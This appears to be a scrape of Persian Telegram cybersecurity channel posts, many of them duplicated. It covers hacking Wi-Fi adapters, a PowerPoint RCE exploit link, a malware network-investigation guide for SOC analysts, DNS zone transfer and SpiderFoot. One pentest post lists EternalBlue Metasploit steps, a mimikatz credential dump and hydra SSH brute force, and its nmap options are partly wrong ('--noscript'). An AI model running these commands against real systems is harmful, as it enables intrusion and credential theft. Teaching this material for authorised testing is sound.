Forwarded from KALI
🔥 بهترین کارتهای شبکه برای هک و شنود در کالی لینوکس (۲۰۲۵):
1. Alfa AWUS036ACH
سرعت: AC1200 (2.4GHz و 5GHz)
چیپست: Realtek RTL8812AU
قدرت گیرندگی عالی
مناسب برای شبکههای 5GHz
برای نصبش باید درایور نصب بشه (در کالی جدید راحتتر شده)
2. Alfa AWUS036NHA
چیپست: Atheros AR9271
فقط 2.4GHz
بسیار پایدار و معروف
بدون نیاز به نصب درایور
مناسب برای حملات MITM، شنود، WPA handshake و...
3. Panda Wireless PAU09
چیپست: Ralink RT5572
2.4GHz و 5GHz
پشتیبانی از مانیتور مود و تزریق پکت
قیمت مناسبتر نسبت به Alfa
4. TP-Link TL-WN722N (نسخه v1 فقط)
چیپست: Atheros AR9271
نسخهی v1 فوقالعاده برای هک، نسخههای بعدی بهدرد نمیخورن (حتماً v1 باشه!)
ارزون و کارراهانداز
@kali_signal
1. Alfa AWUS036ACH
سرعت: AC1200 (2.4GHz و 5GHz)
چیپست: Realtek RTL8812AU
قدرت گیرندگی عالی
مناسب برای شبکههای 5GHz
برای نصبش باید درایور نصب بشه (در کالی جدید راحتتر شده)
2. Alfa AWUS036NHA
چیپست: Atheros AR9271
فقط 2.4GHz
بسیار پایدار و معروف
بدون نیاز به نصب درایور
مناسب برای حملات MITM، شنود، WPA handshake و...
3. Panda Wireless PAU09
چیپست: Ralink RT5572
2.4GHz و 5GHz
پشتیبانی از مانیتور مود و تزریق پکت
قیمت مناسبتر نسبت به Alfa
4. TP-Link TL-WN722N (نسخه v1 فقط)
چیپست: Atheros AR9271
نسخهی v1 فوقالعاده برای هک، نسخههای بعدی بهدرد نمیخورن (حتماً v1 باشه!)
ارزون و کارراهانداز
@kali_signal
❤11
Forwarded from KALI
KALI
xss.is بسته شد🧨
این فروم خفن روسی که همهی کرکرها و هکرهای درستدرمون توش میچرخیدن و هرچی ابزار و دیتای هکی و اکسپلویت و اینا بود میذاشتن، الان دیگه نیستش. یه مدت پیش همونطور که خبر اومد، یکی از کلهگندههاش رو گرفتن، پلیس فرانسه و یوروپل ریختن سرشون، بعدش یا خودشون فرومو بستن که گیر نیفتن یا کلاً سرورها رو خوابوندن و کل اون جامعهی زیرزمینی یهدفعه از هم پاشید.
🔥9
🚨 CVE‑2025‑47175
📌 اجرای کد بدون کلیک تو PowerPoint: فقط با باز کردن یه فایل PPTX مخرب تو PowerPoint 2019 یا Office 365، مهاجم میتونه کنترل سیستم رو بگیره بدون نیاز به هیچ کار اضافهای.
باگ از نوع Use-After-Free تو هندل کردن فایلهای PowerPoint باعث این آسیبپذیری شده.
ترجیحا پاورپوینتتون اپدیت کنید.
⚔️ اکسپلویت:
https://www.exploit-db.com/exploits/52351
📌 اجرای کد بدون کلیک تو PowerPoint: فقط با باز کردن یه فایل PPTX مخرب تو PowerPoint 2019 یا Office 365، مهاجم میتونه کنترل سیستم رو بگیره بدون نیاز به هیچ کار اضافهای.
باگ از نوع Use-After-Free تو هندل کردن فایلهای PowerPoint باعث این آسیبپذیری شده.
ترجیحا پاورپوینتتون اپدیت کنید.
⚔️ اکسپلویت:
https://www.exploit-db.com/exploits/52351
Exploit Database
Microsoft PowerPoint 2019 - Remote Code Execution (RCE)
Microsoft PowerPoint 2019 - Remote Code Execution (RCE). CVE-2025-47175 . remote exploit for Windows platform
❤3👍2🔥1
ViperNułł
Photo
تحقیقات شبکه (Network Investigation) یکی از ارکان کلیدی در فرآیند شناسایی و مقابله با بدافزارها است. بدافزارها معمولاً برای برقراری ارتباط با سرورهای فرمان و کنترل (C\&C)، ارسال دادههای سرقت شده، یا دریافت دستورات، نیازمند تعامل با شبکه هستند. در این مقاله، بر اساس سناریوی عملی، روشها و ابزارهای کلیدی برای شناسایی رفتارهای مخرب از طریق تحلیل شبکه هستش
چرا تحقیقات شبکه مهمه؟
بررسی ترافیک شبکه به تحلیلگر کمک میکند فعالیتهای مخفی بدافزار رو کشف بکنه ، حتی وقتی آنتیویروسها موفق به شناسایی نشن
تحلیل بستههای شبکه (Packet Analysis) اطلاعات دقیق درباره مقصد، نوع دادههای رد و بدل شده، و پروتکلها ارائه میدهد.
کشف الگوهای غیرعادی مثل ارتباط با آیپیهای ناشناس، پورتهای غیرمعمول و دامنههای مشکوک.
جمعآوری دادههای شبکه (Data Collection)
Packet Capture:
ابزارهایی مثل Wireshark، tcpdump، یا Network Miner برای ضبط و تحلیل بستههای شبکه استفاده میشن
NetFlow/sFlow:
جمعآوری دادههای خلاصه جریان شبکه برای مشاهده الگوهای رفتاری بدون نیاز به ذخیره بستههای کامل و سبک
Firewall & Proxy Logs:
ثبت لاگهای فایروال و پراکسی که معمولاً درخواستهای خروجی و ورودی را ردیابی میکنن
DNS Logs:
لاگهای DNS میتوانند کمک کنند تا دامنههای غیرمعمول یا دامنههای ایجاد شده (DGA) شناسایی بشن
شناسایی ترافیک مشکوک
پورتهای غیرمعمول: در سناریوی ما، پورتهای ۸۰ (HTTP)، ۸۰۹۰ و ۸۰۸۸ مورد استفاده قرار گرفتهان وجود ارتباط روی پورتهای غیررایج هشداردهنده است
ارتباط با دامنههای ناشناس: آدرسهایی مثل www1-google-analytics.com:8088 و midnitemeerkats.com که شباهت به دامنههای معتبر ندارند.
ترافیک رمزگذاری شده و Base64: اگر دادهها رمزگذاری شده یا در قالب Base64 باشند، ممکن است تلاش برای پنهانسازی اطلاعات باشد.
فعالیتهای اسکن یا ارتباطات غیرمعمول: حجم بالا یا درخواستهای مکرر به سرورهای خارجی که مشکوک میتونه باشه
تحلیل عملی سناریو فرضی
در این سناریو، ترافیک مشکوک توسط بدافزار به چندین پورت متفاوت ارسال شد که نشان از چندکاناله بودن ارتباط یا تغییر مسیر (Fallback) رو داره
دامنه midnitemeerkats.com جهت نمایش یادداشت باجافزاری استفاده شده که میتوانه نشانگر مرحله حمله باشه
استفاده از پورتهای غیرمعمول مانند ۸۰۸۸ یک روش معمول برای مخفی نگه داشتن ارتباطات بدافزار است
ابزارهای کلیدی تحقیقات شبکه
Wireshark:
برای ضبط و بررسی بستههای شبکه، فیلترگذاری ترافیک و شناسایی ارتباطات مشکوک
tcpdump:
ابزار خط فرمانی سبک برای ضبط بستهها در سیستمهای یونیکسمانند.
Zeek (Bro):
تحلیلگر شبکه که قابلیت تشخیص حملات و رفتارهای غیرعادی رو داره
VirusTotal (Network Submission):
ارسال فایلها یا آدرسهای شبکه برای بررسی سریع توسط آنتیویروسهای متعدد.
Hybrid Analysis:
برای تحلیل رفتاری فایلها در محیطهای شبیهسازی شده و مشاهده ترافیک تولید شده.
نکات مهم برای SOC Tier 1 در تحقیقات شبکه
همیشه ابتدا رفتار ترافیک شبکه را بر اساس الگوهای معمول محیط کاری خود بشناسید تا بتوانید موارد غیرعادی رو تشخیص دهید.
فیلتر کردن ترافیک خروجی به سمت آدرسهای خارجی ناشناس یا غیرعادی را به عنوان هشدار در نظر بگیرید.
ترکیب دادههای لاگها و تحلیل بستهها کمک میکند تا به درک دقیقتری از فعالیت مخرب برسید.
ارتباط با تیمهای دیگر مثل Memory Investigation و Malware Investigation برای رسیدن به تصویر کامل حمله ضروریه
همیشه نمونههای مشکوک را در محیطهای ایزوله یا ماشینهای مجازی امن تحلیل کنید.
اقدامات پس از شناسایی بدافزار از طریق شبکه
مسدود کردن دامنهها یا IPهای مشکوک در فایروالها
قرنطینه سیستمهای آلوده و قطع ارتباط آنها از شبکه
بررسی روندهای انتقال داده و توقف ارتباطات مخرب
تحلیل بیشتر با ابزارهای تخصصی و بهروزرسانی قوانین سیستمهای تشخیص نفوذ (IDS/IPS)
مستندسازی یافتهها و گزارش به تیمهای بالاتر و مدیریت برای اقدامات بعدی
https://news.1rj.ru/str/ViperNull
چرا تحقیقات شبکه مهمه؟
بررسی ترافیک شبکه به تحلیلگر کمک میکند فعالیتهای مخفی بدافزار رو کشف بکنه ، حتی وقتی آنتیویروسها موفق به شناسایی نشن
تحلیل بستههای شبکه (Packet Analysis) اطلاعات دقیق درباره مقصد، نوع دادههای رد و بدل شده، و پروتکلها ارائه میدهد.
کشف الگوهای غیرعادی مثل ارتباط با آیپیهای ناشناس، پورتهای غیرمعمول و دامنههای مشکوک.
جمعآوری دادههای شبکه (Data Collection)
Packet Capture:
ابزارهایی مثل Wireshark، tcpdump، یا Network Miner برای ضبط و تحلیل بستههای شبکه استفاده میشن
NetFlow/sFlow:
جمعآوری دادههای خلاصه جریان شبکه برای مشاهده الگوهای رفتاری بدون نیاز به ذخیره بستههای کامل و سبک
Firewall & Proxy Logs:
ثبت لاگهای فایروال و پراکسی که معمولاً درخواستهای خروجی و ورودی را ردیابی میکنن
DNS Logs:
لاگهای DNS میتوانند کمک کنند تا دامنههای غیرمعمول یا دامنههای ایجاد شده (DGA) شناسایی بشن
شناسایی ترافیک مشکوک
پورتهای غیرمعمول: در سناریوی ما، پورتهای ۸۰ (HTTP)، ۸۰۹۰ و ۸۰۸۸ مورد استفاده قرار گرفتهان وجود ارتباط روی پورتهای غیررایج هشداردهنده است
ارتباط با دامنههای ناشناس: آدرسهایی مثل www1-google-analytics.com:8088 و midnitemeerkats.com که شباهت به دامنههای معتبر ندارند.
ترافیک رمزگذاری شده و Base64: اگر دادهها رمزگذاری شده یا در قالب Base64 باشند، ممکن است تلاش برای پنهانسازی اطلاعات باشد.
فعالیتهای اسکن یا ارتباطات غیرمعمول: حجم بالا یا درخواستهای مکرر به سرورهای خارجی که مشکوک میتونه باشه
تحلیل عملی سناریو فرضی
در این سناریو، ترافیک مشکوک توسط بدافزار به چندین پورت متفاوت ارسال شد که نشان از چندکاناله بودن ارتباط یا تغییر مسیر (Fallback) رو داره
دامنه midnitemeerkats.com جهت نمایش یادداشت باجافزاری استفاده شده که میتوانه نشانگر مرحله حمله باشه
استفاده از پورتهای غیرمعمول مانند ۸۰۸۸ یک روش معمول برای مخفی نگه داشتن ارتباطات بدافزار است
ابزارهای کلیدی تحقیقات شبکه
Wireshark:
برای ضبط و بررسی بستههای شبکه، فیلترگذاری ترافیک و شناسایی ارتباطات مشکوک
tcpdump:
ابزار خط فرمانی سبک برای ضبط بستهها در سیستمهای یونیکسمانند.
Zeek (Bro):
تحلیلگر شبکه که قابلیت تشخیص حملات و رفتارهای غیرعادی رو داره
VirusTotal (Network Submission):
ارسال فایلها یا آدرسهای شبکه برای بررسی سریع توسط آنتیویروسهای متعدد.
Hybrid Analysis:
برای تحلیل رفتاری فایلها در محیطهای شبیهسازی شده و مشاهده ترافیک تولید شده.
نکات مهم برای SOC Tier 1 در تحقیقات شبکه
همیشه ابتدا رفتار ترافیک شبکه را بر اساس الگوهای معمول محیط کاری خود بشناسید تا بتوانید موارد غیرعادی رو تشخیص دهید.
فیلتر کردن ترافیک خروجی به سمت آدرسهای خارجی ناشناس یا غیرعادی را به عنوان هشدار در نظر بگیرید.
ترکیب دادههای لاگها و تحلیل بستهها کمک میکند تا به درک دقیقتری از فعالیت مخرب برسید.
ارتباط با تیمهای دیگر مثل Memory Investigation و Malware Investigation برای رسیدن به تصویر کامل حمله ضروریه
همیشه نمونههای مشکوک را در محیطهای ایزوله یا ماشینهای مجازی امن تحلیل کنید.
اقدامات پس از شناسایی بدافزار از طریق شبکه
مسدود کردن دامنهها یا IPهای مشکوک در فایروالها
قرنطینه سیستمهای آلوده و قطع ارتباط آنها از شبکه
بررسی روندهای انتقال داده و توقف ارتباطات مخرب
تحلیل بیشتر با ابزارهای تخصصی و بهروزرسانی قوانین سیستمهای تشخیص نفوذ (IDS/IPS)
مستندسازی یافتهها و گزارش به تیمهای بالاتر و مدیریت برای اقدامات بعدی
https://news.1rj.ru/str/ViperNull
Telegram
ViperNułł
ViperNull | Exploring the world of network security. Dive into cybersecurity with in-depth content on penetration testing, defensive strategies, vulnerability analysis, and powerful security tools.
Pv ; @Cintaxed
Pv ; @Cintaxed
❤🔥3👌3
🧧Response code HTTP STATUS🧧
100-199 informetion (اطلاعات سایت)
200-299 ok (سایت باز شد)
300-399 redirect(ریدایرکت شده به یه سایت دیگه)
400-499 erore client side (مثال ارور 404)
500-599 erore server side (مثال ارور 503)
https://news.1rj.ru/str/ViperNull
100-199 informetion (اطلاعات سایت)
200-299 ok (سایت باز شد)
300-399 redirect(ریدایرکت شده به یه سایت دیگه)
400-499 erore client side (مثال ارور 404)
500-599 erore server side (مثال ارور 503)
https://news.1rj.ru/str/ViperNull
❤🔥7
Forwarded from KALI
برای تست نفوذ شبکه و تجهیزات معمولاً چند مسیر مشخص داریم که باید مرحله به مرحله جلو بریم.
🔹 ۱. شناسایی (Enumeration & Recon)
اول باید شبکه و تجهیزات هدف رو شناسایی کنیم.
🔸 هدف: پیدا کردن پورتهای باز، سرویسهای فعال و سیستمعامل دستگاهها.
🔹 ۲. کشف آسیبپذیری (Vulnerability Scanning)
بعد از شناسایی سرویسها، باید ببینیم چه ضعفهایی وجود داره.
🔸 هدف: پیدا کردن باگهای شناختهشده و کانفیگهای ضعیف.
🔹 ۳. اکسپلویت (Exploitation)
وقتی ضعف پیدا شد، تست بهرهبرداری میکنیم (با مجوز).
🔸 هدف: بررسی اینکه ضعف امنیتی واقعاً قابل سوءاستفاده هست یا نه.
🔹 ۴. پس از نفوذ (Post-Exploitation)
اگر نفوذ موفقیتآمیز بود، تست میکنیم که دسترسی تا کجا قابل گسترش هست.
🔸 هدف: بررسی سطح دسترسی، جمعآوری اطلاعات بیشتر و شناسایی خطرات.
🔹 ۵. تست تجهیزات شبکه (Router, Switch, Firewall)
روی تجهیزات شبکه هم تستهای خاص انجام میشه:
🔸 هدف: بررسی تنظیمات پیشفرض و پسوردهای ضعیف.
@kali_signal
🔹 ۱. شناسایی (Enumeration & Recon)
اول باید شبکه و تجهیزات هدف رو شناسایی کنیم.
# پینگ برای بررسی فعال بودن هاست
ping -c 4 192.168.1.1
# شناسایی سرویسها و پورتها با Nmap
nmap -sS -sV -O 192.168.1.0/24
# اسکن برای پورتهای باز سریع
nmap -p- --open -T4 192.168.1.10
# شناسایی سیستمعامل
nmap -O 192.168.1.10
# شناسایی ورژن سرویسها
nmap -sV 192.168.1.10
🔸 هدف: پیدا کردن پورتهای باز، سرویسهای فعال و سیستمعامل دستگاهها.
🔹 ۲. کشف آسیبپذیری (Vulnerability Scanning)
بعد از شناسایی سرویسها، باید ببینیم چه ضعفهایی وجود داره.
# اسکن آسیبپذیری با Nmap Script Engine (NSE)
nmap --noscript vuln 192.168.1.10
# استفاده از Nikto برای شناسایی وبسرورها
nikto -h http://192.168.1.20
# استفاده از OpenVAS یا GVM
gvm-cli socket --xml "<get_tasks/>"
🔸 هدف: پیدا کردن باگهای شناختهشده و کانفیگهای ضعیف.
🔹 ۳. اکسپلویت (Exploitation)
وقتی ضعف پیدا شد، تست بهرهبرداری میکنیم (با مجوز).
# اجرای متاسپلویت
msfconsole
# سرچ اکسپلویت برای سرویس
search smb
# ست کردن هدف
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.10
run
🔸 هدف: بررسی اینکه ضعف امنیتی واقعاً قابل سوءاستفاده هست یا نه.
🔹 ۴. پس از نفوذ (Post-Exploitation)
اگر نفوذ موفقیتآمیز بود، تست میکنیم که دسترسی تا کجا قابل گسترش هست.
# گرفتن اطلاعات سیستم
systeminfo
# لیست کاربران
net user
# دسترسی به پسوردهای ذخیرهشده
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
🔸 هدف: بررسی سطح دسترسی، جمعآوری اطلاعات بیشتر و شناسایی خطرات.
🔹 ۵. تست تجهیزات شبکه (Router, Switch, Firewall)
روی تجهیزات شبکه هم تستهای خاص انجام میشه:
# بررسی SNMP
nmap -sU -p 161 192.168.1.1 --noscript=snmp*
# بررسی Telnet/SSH باز بودن
nmap -p 22,23 192.168.1.1
# تست رمزهای ضعیف روی SSH
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1
🔸 هدف: بررسی تنظیمات پیشفرض و پسوردهای ضعیف.
@kali_signal
❤🔥4❤1🔥1
ViperNułł
https://news.1rj.ru/str/ViperNull
ابزار SpiderFoot دستیار خفن جمعآوری اطلاعات متنباز در امنیت سایبری
اصلا ابزار SpiderFoot چی هستش؟
یه ابزار فوقالعاده که اتوماتیکه و کمک میکنه اطلاعات عمومی و باز (Open Source Intelligence یا OSINT) رو درباره یه دامنه، ایمیل، IP و ... جمعآوری کنیم.
به جای اینکه ساعتها با موتورهای جستجو و سایتهای مختلف وقت بذاری، SpiderFoot همهچیز رو سریع میره و جمع میکنه
دقیقا چیکار میکنه؟
از کلی پلاگین (ماژول) استفاده میکنه که هر کدوم بخشی از اطلاعات رو استخراج میکنن؛ مثلاً:
نامهای دامنه مرتبط
آدرسهای ایمیل کارکنان
فناوریهای استفاده شده تو سایت
دادههای شبکه و سرورها
و کلی چیز دیگه
کاربردش چیه؟
تو تست نفوذ، تحلیل امنیتی، و حتی تحقیقات دیجیتال خیلی به درد میخوره. فرض کنید میخواین بدونین یه شرکت یا سایت چقدر اطلاعات ازش بیرون ریخته و چقدر تو فضای عمومی قابل دسترسیه. خب پس بدرد فیلد بلو هم میخوره
نکات مهم درباره سروصدا و دیده شدن این ابزار بخامبگم
SpiderFoot
زیاد سر و صدا نمیکنه، چون از منابع عمومی و API استفاده میکنه،
ولی اگر پلاگینها زیاد باشن تعداد درخواستها بالا میره و ممکنه ردپایی بزاره. البته به هیچ وجه شبیه یه حمله مستقیم نیستش.
محدودیتها و ریسکهایی که ممکنه به وجود بیاد
همه اطلاعاتی که میخواد جمع کنه همیشه کامل و بهروز نیست
بعضی سایتها یا سرویسها ممکنه دسترسی رو محدود کنن
اگر ندانسته استفاده بکنیم ممکنه اطلاعات حساس یا خصوصی رو بیرون بده که خطرساز میشه
https://news.1rj.ru/str/ViperNull
اصلا ابزار SpiderFoot چی هستش؟
یه ابزار فوقالعاده که اتوماتیکه و کمک میکنه اطلاعات عمومی و باز (Open Source Intelligence یا OSINT) رو درباره یه دامنه، ایمیل، IP و ... جمعآوری کنیم.
به جای اینکه ساعتها با موتورهای جستجو و سایتهای مختلف وقت بذاری، SpiderFoot همهچیز رو سریع میره و جمع میکنه
دقیقا چیکار میکنه؟
از کلی پلاگین (ماژول) استفاده میکنه که هر کدوم بخشی از اطلاعات رو استخراج میکنن؛ مثلاً:
نامهای دامنه مرتبط
آدرسهای ایمیل کارکنان
فناوریهای استفاده شده تو سایت
دادههای شبکه و سرورها
و کلی چیز دیگه
کاربردش چیه؟
تو تست نفوذ، تحلیل امنیتی، و حتی تحقیقات دیجیتال خیلی به درد میخوره. فرض کنید میخواین بدونین یه شرکت یا سایت چقدر اطلاعات ازش بیرون ریخته و چقدر تو فضای عمومی قابل دسترسیه. خب پس بدرد فیلد بلو هم میخوره
نکات مهم درباره سروصدا و دیده شدن این ابزار بخامبگم
SpiderFoot
زیاد سر و صدا نمیکنه، چون از منابع عمومی و API استفاده میکنه،
ولی اگر پلاگینها زیاد باشن تعداد درخواستها بالا میره و ممکنه ردپایی بزاره. البته به هیچ وجه شبیه یه حمله مستقیم نیستش.
محدودیتها و ریسکهایی که ممکنه به وجود بیاد
همه اطلاعاتی که میخواد جمع کنه همیشه کامل و بهروز نیست
بعضی سایتها یا سرویسها ممکنه دسترسی رو محدود کنن
اگر ندانسته استفاده بکنیم ممکنه اطلاعات حساس یا خصوصی رو بیرون بده که خطرساز میشه
https://news.1rj.ru/str/ViperNull
Telegram
ViperNułł
ViperNull | Exploring the world of network security. Dive into cybersecurity with in-depth content on penetration testing, defensive strategies, vulnerability analysis, and powerful security tools.
Pv ; @Cintaxed
Pv ; @Cintaxed
❤🔥4🔥1
ViperNułł
https://news.1rj.ru/str/ViperNull
DNS Zone Transfer
چیست و چطور میتوان آن را تشخیص داد؟
قبل از هر چیز یک توضیح کوتاه درباره DNS بدم :
DNS یا Domain Name System
سرویس اصلی اینترنت برای تبدیل نام دامنه به IP هستش. وقتی شما میخواهید وارد مثلاً example.com شوید، کامپیوتر شما نمیتواند مستقیم نام دامنه را بفهمد و به آن متصل شود، چون پروتکل اینترنت فقط با IP کار میکند. DNS مثل یک دفترچه تلفن اینترنتی عمل میکنه که IP متناظر با هر دامنه رو برمیگردونه
هر سایت روی اینترنت یک یا چند DNS سرور دارد که مسئول ارائه این اطلاعات هستن. وقتی مدیر سایت، اطلاعات دامنه خود را روی DNS سرور قرار میدهد، این اطلاعات در دسترس کاربران قرار میگیره. اما بعضی وقتا برخی از سابدامینها یا اطلاعات حساس به اشتباه روی DNS سرور تعریف میشن و ممکن است توسط یک مهاجم قابل دسترسی باشن
Zone Transfer
چیست؟
Zone Transfer یا AXFR
یک فرایند در DNS است که برای کپی کردن تمام اطلاعات یک دامنه از یک DNS سرور استفاده میشود
به زبان ساده بخام بگم
یک مهاجم میتوانه از طریق Zone Transfer کل دایرهالمعارف DNS یک دامنه شامل تمام سابدامینهاش رکوردهای MX، A، TXT و غیره رو بدست بیاره
اما یه نکته این فرایند اکثراً موفق نیست چون اکثر DNS سرورها با پالیسیهای امنیتی درست تنظیم شدهاند و Zone Transfer به درخواستهای ناشناس پاسخ نمیده
اما با این حال برخی DNS سرورهای ضعیف یا بد پیکربندی شده به اشتباه اطلاعات را در اختیار مهاجم قرار میدن
یه مثال عملی بخام بگم
فرض کنید میخوایم برای دامنه zonetransfer.me
سرورهای DNS رو پیدا کنیم و Zone Transfer رو تست کنیم
1 ابتدا لیست سرورهای معتبر رو پیدا میکنیم:
dig +short NS zonetransfer.me
این دستور نام DNS سرورهای دامنه را برمیگردونه مثال بزنم
nsztm1.dnsowl.com
nsztm2.dnsowl.com
سپس تلاش میکنیم Zone Transfer انجام بدیم
dig @nsztm1.dnsowl.com zonetransfer.me AXFR
اگر سرور به درستی پیکربندی شده باشد، معمولاً خطای دسترسی دریافت میکنیم و عملیات ناموفق است. اما اگر سرور ضعیف باشد، تمام رکوردهای دامنه نمایش داده میشود.
نکات مهم برای SOC
برای SOC (Security Operations Center)
Zone Transfer
میتواند هم تهدید باشد و هم منبع اطلاعات مفید برای کشف مشکلات امنیتی:
شناسایی فعالیت مشکوک:
درخواستهای AXFR از منابع خارجی میتواند نشانه تلاش مهاجم برای جمعآوری اطلاعات باشن
ثبت لاگهای DNS برای تحلیل چنین فعالیتهایی ضروریه
پالیسیها :
اطمینان از اینکه Zone Transfer فقط بین DNSهای داخلی انجام میشه و برای عموم مسدود هستش
بررسی و محدود کردن دسترسی به سرویسهای DNS در فایروال و ACL
تستهای امنیتی داخلی:
تستهای دورهای Zone Transfer روی سرورهای داخلی برای شناسایی مشکلات پیکربندی قبل از نفوذ مهاجم
استفاده از ابزارهایی مثل dig یا اسکریپتهای خودکار برای کشف رکوردهای غیرمجاز
هشدار و واکنش:
هرگونه تلاش برای Zone Transfer از منابع غیرمجاز باید به سرعت به تیم SOC اطلاع داده بشه
میتوان سیستم هشدار خودکار برای ترافیک DNS غیرمعمول راهاندازی بکنیم
https://news.1rj.ru/str/ViperNull
چیست و چطور میتوان آن را تشخیص داد؟
قبل از هر چیز یک توضیح کوتاه درباره DNS بدم :
DNS یا Domain Name System
سرویس اصلی اینترنت برای تبدیل نام دامنه به IP هستش. وقتی شما میخواهید وارد مثلاً example.com شوید، کامپیوتر شما نمیتواند مستقیم نام دامنه را بفهمد و به آن متصل شود، چون پروتکل اینترنت فقط با IP کار میکند. DNS مثل یک دفترچه تلفن اینترنتی عمل میکنه که IP متناظر با هر دامنه رو برمیگردونه
هر سایت روی اینترنت یک یا چند DNS سرور دارد که مسئول ارائه این اطلاعات هستن. وقتی مدیر سایت، اطلاعات دامنه خود را روی DNS سرور قرار میدهد، این اطلاعات در دسترس کاربران قرار میگیره. اما بعضی وقتا برخی از سابدامینها یا اطلاعات حساس به اشتباه روی DNS سرور تعریف میشن و ممکن است توسط یک مهاجم قابل دسترسی باشن
Zone Transfer
چیست؟
Zone Transfer یا AXFR
یک فرایند در DNS است که برای کپی کردن تمام اطلاعات یک دامنه از یک DNS سرور استفاده میشود
به زبان ساده بخام بگم
یک مهاجم میتوانه از طریق Zone Transfer کل دایرهالمعارف DNS یک دامنه شامل تمام سابدامینهاش رکوردهای MX، A، TXT و غیره رو بدست بیاره
اما یه نکته این فرایند اکثراً موفق نیست چون اکثر DNS سرورها با پالیسیهای امنیتی درست تنظیم شدهاند و Zone Transfer به درخواستهای ناشناس پاسخ نمیده
اما با این حال برخی DNS سرورهای ضعیف یا بد پیکربندی شده به اشتباه اطلاعات را در اختیار مهاجم قرار میدن
یه مثال عملی بخام بگم
فرض کنید میخوایم برای دامنه zonetransfer.me
سرورهای DNS رو پیدا کنیم و Zone Transfer رو تست کنیم
1 ابتدا لیست سرورهای معتبر رو پیدا میکنیم:
dig +short NS zonetransfer.me
این دستور نام DNS سرورهای دامنه را برمیگردونه مثال بزنم
nsztm1.dnsowl.com
nsztm2.dnsowl.com
سپس تلاش میکنیم Zone Transfer انجام بدیم
dig @nsztm1.dnsowl.com zonetransfer.me AXFR
اگر سرور به درستی پیکربندی شده باشد، معمولاً خطای دسترسی دریافت میکنیم و عملیات ناموفق است. اما اگر سرور ضعیف باشد، تمام رکوردهای دامنه نمایش داده میشود.
نکات مهم برای SOC
برای SOC (Security Operations Center)
Zone Transfer
میتواند هم تهدید باشد و هم منبع اطلاعات مفید برای کشف مشکلات امنیتی:
شناسایی فعالیت مشکوک:
درخواستهای AXFR از منابع خارجی میتواند نشانه تلاش مهاجم برای جمعآوری اطلاعات باشن
ثبت لاگهای DNS برای تحلیل چنین فعالیتهایی ضروریه
پالیسیها :
اطمینان از اینکه Zone Transfer فقط بین DNSهای داخلی انجام میشه و برای عموم مسدود هستش
بررسی و محدود کردن دسترسی به سرویسهای DNS در فایروال و ACL
تستهای امنیتی داخلی:
تستهای دورهای Zone Transfer روی سرورهای داخلی برای شناسایی مشکلات پیکربندی قبل از نفوذ مهاجم
استفاده از ابزارهایی مثل dig یا اسکریپتهای خودکار برای کشف رکوردهای غیرمجاز
هشدار و واکنش:
هرگونه تلاش برای Zone Transfer از منابع غیرمجاز باید به سرعت به تیم SOC اطلاع داده بشه
میتوان سیستم هشدار خودکار برای ترافیک DNS غیرمعمول راهاندازی بکنیم
https://news.1rj.ru/str/ViperNull
Telegram
ViperNułł
ViperNull | Exploring the world of network security. Dive into cybersecurity with in-depth content on penetration testing, defensive strategies, vulnerability analysis, and powerful security tools.
Pv ; @Cintaxed
Pv ; @Cintaxed
👏5🔥2
برای دیدن یه نمونه باحال از XSS با عکس و متادیتا (EXIF) این مقاله رو حتما بخونین :
https://shahjerry33.medium.com/xss-via-exif-data-the-p2-elevator-d09e7b7fe9b9
https://news.1rj.ru/str/ViperNull
https://shahjerry33.medium.com/xss-via-exif-data-the-p2-elevator-d09e7b7fe9b9
https://news.1rj.ru/str/ViperNull
❤🔥6